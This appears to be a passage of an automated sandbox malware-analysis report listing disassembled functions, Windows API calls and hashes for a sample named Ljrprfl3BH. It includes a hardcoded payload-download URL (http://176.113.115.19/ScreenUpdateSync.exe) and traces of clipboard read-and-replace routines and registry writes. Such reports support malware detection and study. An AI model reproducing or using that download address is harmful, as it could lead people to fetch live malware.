                                                                            • Instruction Fuzzy Hash: 92012836710114ABDB159FAADC058EE7B2AEFCA721F24020AF81597290EB74ED528794

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 487 402ba3-402bcf RegCreateKeyExW 488 402bd1-402be3 RegSetValueExW 487->488 489 402be5-402be8 487->489 488->489 490 402bf3-402bf9 489->490 491 402bea-402bed RegCloseKey 489->491 491->490
                                                                            APIs
                                                                            • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BC5
                                                                            • RegSetValueExW.KERNEL32(?,?,00000000,00000001,?,00000004,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BDD
                                                                            • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BED
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateValue
                                                                            • String ID:
                                                                            • API String ID: 1818849710-0
                                                                            • Opcode ID: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                            • Instruction ID: 504cdbf1e8d79b6d7283afc99896261950e1a919ac783b79018d19fe3f3d7e53
                                                                            • Opcode Fuzzy Hash: 17a0f39c5dea863e0681c067e94205fb1cf9212befe975e377a74504568b03c9
                                                                            • Instruction Fuzzy Hash: 16F0B4B650011CFFEB214F94DD89DABBA7CEB047E9F100175FA01B2150D6B19E009664

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 492 42e064-42e071 call 431f4e 495 42e073-42e076 ExitThread 492->495 496 42e07c-42e084 492->496 496->495 497 42e086-42e08a 496->497 498 42e091-42e097 497->498 499 42e08c call 4354e6 497->499 501 42e0a4-42e0aa 498->501 502 42e099-42e09b 498->502 499->498 501->495 504 42e0ac-42e0ae 501->504 502->501 503 42e09d-42e09e CloseHandle 502->503 503->501 504->495 505 42e0b0-42e0ba FreeLibraryAndExitThread 504->505
                                                                            APIs
                                                                              • Part of subcall function 00431F4E: GetLastError.KERNEL32(?,?,?,0042EABE,00434D6C,?,00431EF8,00000001,00000364,?,0042DFD5,00457910,00000010), ref: 00431F53
                                                                              • Part of subcall function 00431F4E: _free.LIBCMT ref: 00431F88
                                                                              • Part of subcall function 00431F4E: SetLastError.KERNEL32(00000000), ref: 00431FBC
                                                                            • ExitThread.KERNEL32 ref: 0042E076
                                                                            • CloseHandle.KERNEL32(?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E09E
                                                                            • FreeLibraryAndExitThread.KERNEL32(?,?,?,?,0042E196,?,?,0042E00D,00000000), ref: 0042E0B4
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorExitLastThread$CloseFreeHandleLibrary_free
                                                                            • String ID:
                                                                            • API String ID: 1198197534-0
                                                                            • Opcode ID: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                            • Instruction ID: fd9bad38e730a393213bf68ec19d44fd98ecce05ba50bc9e79acb20fd3a4735a
                                                                            • Opcode Fuzzy Hash: 358fd455719f577d8bc93a3d3127ed53d65e98e9d00355e3dd6338ab7ece4e02
                                                                            • Instruction Fuzzy Hash: 8CF05E342006347BEB319F37EC08A5B7A98AF05725F584756B924C22A1DBBCDD82869C

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 506 402394-4023a2 507 402557-402559 PostQuitMessage 506->507 508 4023a8-4023ad 506->508 509 40255f-402564 507->509 510 4023c6-4023cd 508->510 511 4023af-4023c1 DefWindowProcW 508->511 512 4023d4-4023db 510->512 513 4023cf call 401d9a 510->513 511->509 512->509 515 4023e1-402555 call 4010ba call 4029ea 512->515 513->512 515->509
                                                                            APIs
                                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 004023BB
                                                                            • PostQuitMessage.USER32(00000000), ref: 00402559
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: MessagePostProcQuitWindow
                                                                            • String ID:
                                                                            • API String ID: 3873111417-0
                                                                            • Opcode ID: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                            • Instruction ID: bf68dd1ed3332b821989bb5fb7b10a9ee1776f212d734df2d08f0bb157d40bf1
                                                                            • Opcode Fuzzy Hash: d57fbe59a329fb309be7fe1269fcb85092641ffb4e542ab0082b7c0a7099a69f
                                                                            • Instruction Fuzzy Hash: 1A412D11A64380A5E630FFA5BC55B2533B0FF54712F10653BE524DB2B6E3B28544C75E
                                                                            APIs
                                                                            • Sleep.KERNEL32(00001562), ref: 00401562
                                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen$Sleep
                                                                            • String ID: http://176.113.115.19/ScreenUpdateSync.exe
                                                                            • API String ID: 3358372957-3120454669
                                                                            • Opcode ID: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                            • Instruction ID: 7c00d7bba67f06605ca45885bb35db497ce8a02c3eee20c143d632ed8421155e
                                                                            • Opcode Fuzzy Hash: 7701b78b2553ec30eafcf5b5a8124595c597b4782acb6499a108b1673ff50c75
                                                                            • Instruction Fuzzy Hash: 49317955A6538094E330DFA0BC56B252370FF64B52F50653BD60CCB2B2E7A18587C75E
                                                                            APIs
                                                                            • SetErrorMode.KERNEL32(00000400,?,?,02190223,?,?), ref: 02190E19
                                                                            • SetErrorMode.KERNEL32(00000000,?,?,02190223,?,?), ref: 02190E1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorMode
                                                                            • String ID:
                                                                            • API String ID: 2340568224-0
                                                                            • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                            • Instruction ID: 21ca65ad85a8ce6438a58ef1f168db7b8c905be62331c0c1ea154a16017632c9
                                                                            • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                            • Instruction Fuzzy Hash: 79D0123514512877DB002A94DC09BCD7B1CDF09B66F108011FB0DD9080C770954046E5
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                            • Instruction ID: bbb5b7410918ed3a19f08aeefc1504024edbbdc2131895f71ed4605d11f41fec
                                                                            • Opcode Fuzzy Hash: 77dff8414438c132d9b1b222249ac9577754d763359ce41167806e2a442978e4
                                                                            • Instruction Fuzzy Hash: EB51E971A00214AFDB10DF59C844BEA7BA1EFC9364F19929AF8099B391C735FD42CB94
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: __fread_nolock
                                                                            • String ID:
                                                                            • API String ID: 2638373210-0
                                                                            • Opcode ID: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                            • Instruction ID: 4d174249788eeb6afcd1119ee109bea02bf0543b951493d32b1ba631c5db93a5
                                                                            • Opcode Fuzzy Hash: a181b7be805d7fa44ac39242885525ea8222ab64a8fcafdecb561f0e5ce962c8
                                                                            • Instruction Fuzzy Hash: 18319CB1604716AFC710DE2AC88091ABFA8BF84351F04853EFC44A7391D779EA548BCA
                                                                            APIs
                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004028FC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                            • String ID:
                                                                            • API String ID: 323602529-0
                                                                            • Opcode ID: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                            • Instruction ID: a96161e1099ed2e4ebc89c8b3bfd47f038f5993eec498a984b7603ffbfb0c6fe
                                                                            • Opcode Fuzzy Hash: 72fdb1b190d3a1d2d7d6c29d22f11b53277dfea25eaf381d8fe65a68052a5e16
                                                                            • Instruction Fuzzy Hash: C8312BB4D002199BDB14EFA5D881AEDBBB4BF48304F5085AEE415B3281DB786A48CF54
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: H_prolog3_catch
                                                                            • String ID:
                                                                            • API String ID: 3886170330-0
                                                                            • Opcode ID: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                            • Instruction ID: df22ffae6d2fe3b800e0c8e4f2770173a5e1bd04bbee8454eb0c8e7fe139aa3e
                                                                            • Opcode Fuzzy Hash: ccf9f932eb112f7f3215526f30a1f7312533cc0aacad866aa3aa8a24b0442ac4
                                                                            • Instruction Fuzzy Hash: C1215B70A00205EFCB15DF55C484EAEBBB5BF88705F14816EE805AB3A1C778AE50DF94
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: __wsopen_s
                                                                            • String ID:
                                                                            • API String ID: 3347428461-0
                                                                            • Opcode ID: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                            • Instruction ID: ab2784c25bcc6a383b761dc233afc1089a93ea485bdb2d241c4dcfca41164893
                                                                            • Opcode Fuzzy Hash: ebde34e331f36d73ae22f6b7be2bf13c9f524ff7c3251c4fe3554b52cc0156cf
                                                                            • Instruction Fuzzy Hash: 2511487590420AAFCF05DF58E94199B7BF4FF48314F10406AF808AB311D770EA11CBA9
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: _free
                                                                            • String ID:
                                                                            • API String ID: 269201875-0
                                                                            • Opcode ID: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                            • Instruction ID: 35ea3ad1aa6a7a88a67b465f5c451a9d93fb5bd3893c922deb476a376b6bfb46
                                                                            • Opcode Fuzzy Hash: dcff01ba0718bc25fbadba801be0e76f759b5211c2d86b2f90a3e61a906836b7
                                                                            • Instruction Fuzzy Hash: 3EF0BE33810008BBCF115E96DC01DDF3B6EEF8D339F100116F914921A0DB3ACA22ABA4
                                                                            APIs
                                                                            • RtlAllocateHeap.NTDLL(00000000,0040D866,00000000,?,0042678E,00000002,00000000,00000000,00000000,?,0040CD17,0040D866,00000004,00000000,00000000,00000000), ref: 004336C9
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: AllocateHeap
                                                                            • String ID:
                                                                            • API String ID: 1279760036-0
                                                                            • Opcode ID: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                            • Instruction ID: eec6a97fd20e662809c0c25a02e68f43ccf4a0d84c2e20558320e6cd2c3c69d0
                                                                            • Opcode Fuzzy Hash: 94f750592cee1f743f5fc95d96a6c8fbd485f7a37a0c4c452716bcfbad1791b8
                                                                            • Instruction Fuzzy Hash: 6CE0E5213006207FDA303F675C06B5B36489F49BBAF142137AC06927D1DB2CEE0085ED
                                                                            APIs
                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004103B7
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Exception@8Throw
                                                                            • String ID:
                                                                            • API String ID: 2005118841-0
                                                                            • Opcode ID: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                            • Instruction ID: 7514a9331385c8c8780a364a21f4f069850cbfc0a8d6a65b648f56ba84841e90
                                                                            • Opcode Fuzzy Hash: b2a61ea650375c75c53941cf1669b74608d6a6abec66458302ae90db8424a762
                                                                            • Instruction Fuzzy Hash: 75E02B3050020DB3CB147665FC1185D777C5A10318BA04237BC28A14D1DF78E59DC48D
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: Deallocate
                                                                            • String ID:
                                                                            • API String ID: 1075933841-0
                                                                            • Opcode ID: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                                            • Instruction ID: c6a90010cc82c6af4b2e2e45e77130760a7975798786c53cab60dd12cc2cc1c7
                                                                            • Opcode Fuzzy Hash: d86d5cecc1e96241595adfcfb1704e736ddb91d28ce44d5c5f584f8131ffb7cb
                                                                            • Instruction Fuzzy Hash: 44D06771518611CEE374DFB9E440656B7E4EF44310B20892FE4D9D3694E674A880CB54
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,0043D0D5,?,?,00000000,?,0043D0D5,00000000,0000000C), ref: 0043CD17
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                            • Instruction ID: f5cec35e3468c2ebfedbe18043dc9de9c020ce50a8bef62643be49baa2ffa0a5
                                                                            • Opcode Fuzzy Hash: c1825962b9e2d68b99604ae1ec91ea351fd51148a2f332f138c69e8dc7c90181
                                                                            • Instruction Fuzzy Hash: DCD06C3200014DBBDF028F84DC06EDA3BAAFB48714F014150BA1856020C732E921AB95
                                                                            APIs
                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 0070948E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666285688.0000000000708000.00000040.00000020.00020000.00000000.sdmp, Offset: 00708000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_708000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocVirtual
                                                                            • String ID:
                                                                            • API String ID: 4275171209-0
                                                                            • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                            • Instruction ID: 213ead1d52f66436fbd976d5b4a298755a1858443aded8bdb76ca5aab797aee0
                                                                            • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                            • Instruction Fuzzy Hash: 94113C79A00208EFDB01DF98C989E99BBF5AF08351F058094FA489B362D375EA50DF80
                                                                            APIs
                                                                            • __EH_prolog3_GS.LIBCMT ref: 0219194D
                                                                            • Sleep.KERNEL32(00001541,0000004C), ref: 02191957
                                                                              • Part of subcall function 0219CE6D: _strlen.LIBCMT ref: 0219CE84
                                                                            • OpenClipboard.USER32(00000000), ref: 02191984
                                                                            • GetClipboardData.USER32(00000001), ref: 02191994
                                                                            • _strlen.LIBCMT ref: 021919B0
                                                                            • _strlen.LIBCMT ref: 021919DF
                                                                            • _strlen.LIBCMT ref: 02191B23
                                                                            • EmptyClipboard.USER32 ref: 02191B39
                                                                            • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 02191B46
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 02191B70
                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 02191B79
                                                                            • GlobalFree.KERNEL32(00000000), ref: 02191B80
                                                                            • CloseClipboard.USER32 ref: 02191BA4
                                                                            • Sleep.KERNEL32(000002D2), ref: 02191BAF
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Clipboard$_strlen$Global$DataSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                            • String ID: 4#E$i
                                                                            • API String ID: 4246938166-2480119546
                                                                            • Opcode ID: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                            • Instruction ID: da820b4022a238f95ebbeff93e6f8077d8252f279e5ee3fb31ab2dd3cd38b570
                                                                            • Opcode Fuzzy Hash: 2174ad36780032491f16a4b006e1811d67a0bbf275fc49b55c7ccd29e86107dc
                                                                            • Instruction Fuzzy Hash: E9511530C40785AEEB219FA8DD457FC7B74FF2A306F045225D806A6162EB709BC5CB69
                                                                            APIs
                                                                            • NtdllDefWindowProc_W.NTDLL(?,00000014,?,?), ref: 02192392
                                                                            • GetClientRect.USER32(?,?), ref: 021923A7
                                                                            • GetDC.USER32(?), ref: 021923AE
                                                                            • CreateSolidBrush.GDI32(00646464), ref: 021923C1
                                                                            • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 021923E0
                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 02192401
                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0219240C
                                                                            • MulDiv.KERNEL32(00000008,00000000), ref: 02192415
                                                                            • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,00451F10), ref: 02192439
                                                                            • SetBkMode.GDI32(?,00000001), ref: 021924C4
                                                                            • _wcslen.LIBCMT ref: 021924DC
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$BrushCapsClientDeviceFontModeNtdllProc_RectRectangleSolidWindow_wcslen
                                                                            • String ID:
                                                                            • API String ID: 1529870607-0
                                                                            • Opcode ID: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                            • Instruction ID: 93b44cef017fd49e6df25b6f89266743d7329abce13a442320bc0f3d7c093ad8
                                                                            • Opcode Fuzzy Hash: 0acec2352bfee5fb509a06a029cf7d051f74621778bf16c22ee55e69e02e9778
                                                                            • Instruction Fuzzy Hash: FE71EC72900218AFDB229F68DD85FAEBBBCEF09711F0041A5F509E6155DA70AF80CF10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: __floor_pentium4
                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                            • API String ID: 4168288129-2761157908
                                                                            • Opcode ID: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                            • Instruction ID: eb952a9da5ee3ca1a054b410db7a12ab4ba9b877121e99a49e25e720736a14a4
                                                                            • Opcode Fuzzy Hash: 2a2d365047bf796e5a42fa6adb0b944c1dfdedc73d6b8ee900228538ecdde80e
                                                                            • Instruction Fuzzy Hash: 1EC25B71E096288FDB25CE29DD407EAB7B5EB48304F1451EBD84DE7280E778AE818F45
                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B7F7
                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,0043BA7D,?,00000000), ref: 0043B820
                                                                            • GetACP.KERNEL32(?,?,0043BA7D,?,00000000), ref: 0043B835
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID: ACP$OCP
                                                                            • API String ID: 2299586839-711371036
                                                                            • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                            • Instruction ID: 1b44de1f7026d878333f9870d974062101081d782898e535d61b674f6735b06a
                                                                            • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                            • Instruction Fuzzy Hash: 0821CB75A00105A6D7349F14C901BA773AAEF9CF60F569466EA09D7310E736DD41C3D8
                                                                            APIs
                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,021CBCE4,?,00000000), ref: 021CBA5E
                                                                            • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,021CBCE4,?,00000000), ref: 021CBA87
                                                                            • GetACP.KERNEL32(?,?,021CBCE4,?,00000000), ref: 021CBA9C
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InfoLocale
                                                                            • String ID: ACP$OCP
                                                                            • API String ID: 2299586839-711371036
                                                                            • Opcode ID: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                            • Instruction ID: c1f9332e315f4e7af61c9a1cb1f3761b62fa26d1b581721143e653e2ce549ccf
                                                                            • Opcode Fuzzy Hash: 21f00b6a3c247b9fce04692a0f5e8342b2d0b582c69aad3f893cd06e155ac896
                                                                            • Instruction Fuzzy Hash: 9321A12AA88105EAD7348F55D903BA773A6EB60E5CB67846CE98AD7110FB32DF40C750
                                                                            APIs
                                                                              • Part of subcall function 00431ECA: GetLastError.KERNEL32(?,?,0042DFD5,00457910,00000010), ref: 00431ECE
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F01
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F42
                                                                              • Part of subcall function 00431ECA: _free.LIBCMT ref: 00431F29
                                                                              • Part of subcall function 00431ECA: SetLastError.KERNEL32(00000000), ref: 00431F36
                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 0043BA3E
                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 0043BA99
                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 0043BAA8
                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,004307A5,00000040,?,004308C5,00000055,00000000,?,?,00000055,00000000), ref: 0043BAF0
                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,00430825,00000040), ref: 0043BB0F
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4663414983.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_400000_Ljrprfl3BH.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                            • String ID:
                                                                            • API String ID: 2287132625-0
                                                                            • Opcode ID: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                            • Instruction ID: e5497ab5c31cc8eb6cce8c5579f1d7db95bd29b644ec7623244df27cb8a16c00
                                                                            • Opcode Fuzzy Hash: 38d8fd1994316528ab50ff09970b315fc0b2a3ba84deb6354b1998d5a23f6b58
                                                                            • Instruction Fuzzy Hash: E25173719006099BDB10EFA5DC45BBF73B8FF4C700F14556BEA14E7290EB789A048BA9
                                                                            APIs
                                                                              • Part of subcall function 021C2131: GetLastError.KERNEL32(?,?,021BA9DC,?,00000000,?,021BCDD6,02192474,00000000,?,00451F20), ref: 021C2135
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2168
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C21A9
                                                                              • Part of subcall function 021C2131: _free.LIBCMT ref: 021C2190
                                                                              • Part of subcall function 021C2131: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 021C219D
                                                                            • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 021CBCA5
                                                                            • IsValidCodePage.KERNEL32(00000000), ref: 021CBD00
                                                                            • IsValidLocale.KERNEL32(?,00000001), ref: 021CBD0F
                                                                            • GetLocaleInfoW.KERNEL32(?,00001001,021C0A0C,00000040,?,021C0B2C,00000055,00000000,?,?,00000055,00000000), ref: 021CBD57
                                                                            • GetLocaleInfoW.KERNEL32(?,00001002,021C0A8C,00000040), ref: 021CBD76
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.4666703804.0000000002190000.00000040.00001000.00020000.00000000.sdmp, Offset: 02190000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_2190000_Ljrprfl3BH.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser
                                                                            • String ID:
                                                                            • API String ID: 2287132625-0
                                                                            • Opcode ID: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                            • Instruction ID: b55aaf5f27edfeaecc8a6f66b46cff3ac7799fc686accc8b9e09bdcb1f584f55
                                                                            • Opcode Fuzzy Hash: 119725e359bc42e0bfb9cdb5970e3de8a9f9b5c3b1583b7d82a4707c3220fec3
                                                                            • Instruction Fuzzy Hash: 7D518079984209AFDB10DFA5CC42ABE73B9EF24708F24042DE910E7250EB719B41CBA5
                                                                            APIs
